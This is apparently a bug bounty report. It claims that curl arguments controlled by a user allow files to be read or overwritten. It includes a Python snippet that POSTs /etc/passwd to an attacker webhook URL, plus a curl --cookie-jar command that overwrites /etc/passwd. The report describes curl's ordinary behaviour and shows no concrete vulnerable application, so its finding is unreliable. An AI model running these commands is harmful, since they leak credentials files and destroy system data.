Arbitrary File Read via Unsanitized curl Usage Results in Sensitive File Exposure

Hello team, First of all, your open report policy has improved me a lot. Your very caring team has motivated me a lot. A real bug bounty program. I hope I can contribute something to you with this report.Thank you. The application uses curl in a way that allows an attacker to specify arbitrary file paths as input for parameters like --cookie-jar or via POST data (-d @file). If untrusted user input is passed to these arguments, it’s possible to overwrite sensitive files or exfiltrate server files to an external attacker-controlled server. This can lead to sensitive data disclosure or denial of service. ## Impact Impact Sensitive file disclosure (exfiltration of /etc/passwd or other files). Overwriting critical files (e.g., authorized_keys, .env, configuration files). Potential supply chain compromise in automated build or CI environments. Attack Scenario Example 1: File Exfiltration with POST If user input controls the file path (e.g. filename or data argument in a curl command): ``` import subprocess # Attacker's endpoint webhook_url = "https://webhook.site/fd9dfaf1-7ed0-446e-9c6f-e182f6b11e4e" file_path = "/etc/passwd" cmd = [ "curl", "-X", "POST", "-d", f"@{file_path}", webhook_url ] subprocess.run(cmd, check=True) ``` Result: The entire contents of /etc/passwd are POSTed to the attacker's server. This can be any sensitive file on the system. Example 2: Overwriting Files with --cookie-jar If an attacker can control the filename passed to --cookie-jar: ``` curl --cookie-jar /etc/passwd https://example.com ``` Result: The target file (/etc/passwd) is overwritten with a cookie file, destroying its original content. If this is a critical file, the application/system may become unusable. Recommendation : never use unsanitized user input in system commands, especially file paths. Sanitize and validate all file inputs. If you must allow user-supplied files, use strict whitelisting and store files in isolated, non-sensitive directories. Avoid passing user input directly to curl command line without checks.